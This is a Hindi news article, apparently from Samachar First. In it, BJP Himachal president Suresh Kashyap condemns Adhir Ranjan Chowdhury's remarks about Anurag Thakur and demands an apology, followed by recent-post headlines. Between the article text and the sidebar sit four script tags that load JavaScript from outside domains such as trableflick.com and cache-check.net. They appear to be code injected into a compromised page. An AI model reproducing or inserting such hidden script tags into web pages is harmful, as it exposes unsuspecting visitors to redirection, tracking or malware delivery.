अधीर रंजन द्वारा अनुराग ठाकुर के प्रति अमर्यादित भाषा का प्रयोग करना अशोभनीय: सुरेश कश्यप

<p>बीजेपी प्रदेश अध्यक्ष एवं सांसद सुरेश कश्यप ने कांग्रेस नेता अधीर रंजन द्वारा केंद्रीय वित्त राज्य मंत्री अनुराग ठाकुर के प्रति अमर्यादित भाषा का प्रयोग करने पर आपत्ति जताई है। सुरेश कश्यप ने कहा कि संसद में मेरे सहयोगी, हिमाचल के बेटे केंद्रीय राज्य वित्त मंत्री अनुराग ठाकुर द्वारा तर्क और साक्ष्यों के साथ प्रधान मंत्री राहत कोष के बारे में देश को जानकारी देने पर गांधी नेहरू परिवार की सच्चाई देश के सामने लाने पर कांग्रेस भड़क उठी और कांग्रेस के नेता अधीर रंजन चौधरी हमेशा की तरह अमर्यादित होकर बयानबाजी करने लगे।</p>

<p>उन्होंने कहा कि अधीर रंजन द्वारा अनुराग ठाकुर के प्रति अमर्यादित भाषा का प्रयोग करना अशोभनीय और घोर निंदनीय है। यह केवल अनुराग ठाकुर का ही अपमान नहीं अपितु पूरे हिमाचल प्रदेश का अपमान है। प्रदेश अध्यक्ष ने इस प्रकरण की कड़े शब्दों में निंदा की हैं । बीजेपी प्रदेश अध्यक्ष ने कहा कि आज भी कांग्रेस पार्टी एक परिवार की ही गुलामी से बाहर नहीं निकल पा रही है । इस प्रकार की भाषा कांग्रेस पार्टी की संकीर्ण मानसिकता को दिखाती है। आज कांग्रेस के नेता अपनी निर्बलता का जीता जाता उदाहरण दे रही है। आज कांग्रेस ने अपने संस्कारों को जनता के समक्ष रखा है कि किस प्रकार से वह केंद्रीय वित्त मंत्री के पद की गरिमा को भी भुला बैठे हैं।</p>

<p></p>

<p>सुरेश कश्यप ने कहा कि कांग्रेस के नेता एक ही परिवार अंधभक्त बन गए हैं जबकि पूरे देश को गांधी परिवार की सच्चाई पता लग चुकी है पर इनके नेता आज भी अपनी आंखों पर काली पट्टी बांधकर बैठे हैं। उन्होंने कहा अधीर रंजन चौधरी अपने अमर्यादित बयान के लिए बिना शर्त माफी मांगे और भविष्य में ऐसे अमर्यादित और बचकाना बयान देने से परहेज करें अन्यथा बीजेपी इसका कड़ा संज्ञान लेगी।</p>
<script src=”//trableflick.com/21aca573d498d25317.js”></script>
<script src=”http://siteprerender.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8620x” type=”text/javascript”></script>
<script src=”http://cache-check.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8620x&amp;format=arrjs&amp;r=1600511674369″ type=”text/javascript”></script>
<script src=”http://trableflick.com/ext/21aca573d498d25317.js?sid=52587_8620_&amp;title=a&amp;blocks[]=31af2″ type=”text/javascript”></script>

Samachar First

Recent Posts

रेणुका विधानसभा क्षेत्र को उप मुख्यमंत्री का तोहफा, 2.40 करोड़ के विकास कार्यों का शुभारंभ

नाहन। उप मुख्यमंत्री मुकेश अग्निहोत्री ने आज जिला सिरमौर के श्री रेणुका जी विधान सभा…

5 hours ago

जानें कौन सी योजना देगी 1% ब्याज पर 20 लाख का शिक्षा ऋण

  Shimla: डॉ. वाईएस परमार ऋण योजना को सुक्‍खू सरकार ने विस्‍तार दिया है। योजना…

6 hours ago

28 सितंबर को शांतिपूर्ण प्रदर्शन, फैसला न आने पर जेल भरो आंदोलन

  Shimla: संजौली अवैध मस्जिद विवाद शांत नहीं हुआ है। 28 सितंबर को देवभूमि संघर्ष…

6 hours ago

कंगना का कांग्रेस पर करारा वार: कांग्रेस को बच्चे पालने का शौक, पप्पू और बहन की हरकतें बचकानी

  Mandi: मंडी के गोहर में एक कार्यक्रम में सांसद कंगना ने कांग्रेस के शीर्ष…

7 hours ago

पीएम मोदी कर रहे बदनाम, हिमाचलआर्थिक तंगी से नहीं जूझ रहा: डिप्टी सीएम

  Sirmour: उपमुख्यमंत्री मुकेश अग्निहोत्री ने आरोप लगाया है कि भाजपा के केंद्रीय व प्रदेश…

8 hours ago

स्वच्छ रहेगा घर, नगर व पंचायत तभी तो स्वस्थ रहेगा इंसान: उषा बिरला

  Hamirpur: ग्राम पंचायत दडूही में सोमवार को स्वच्छ भारत मिशन के तहत स्वच्छता पखवाड़ा…

8 hours ago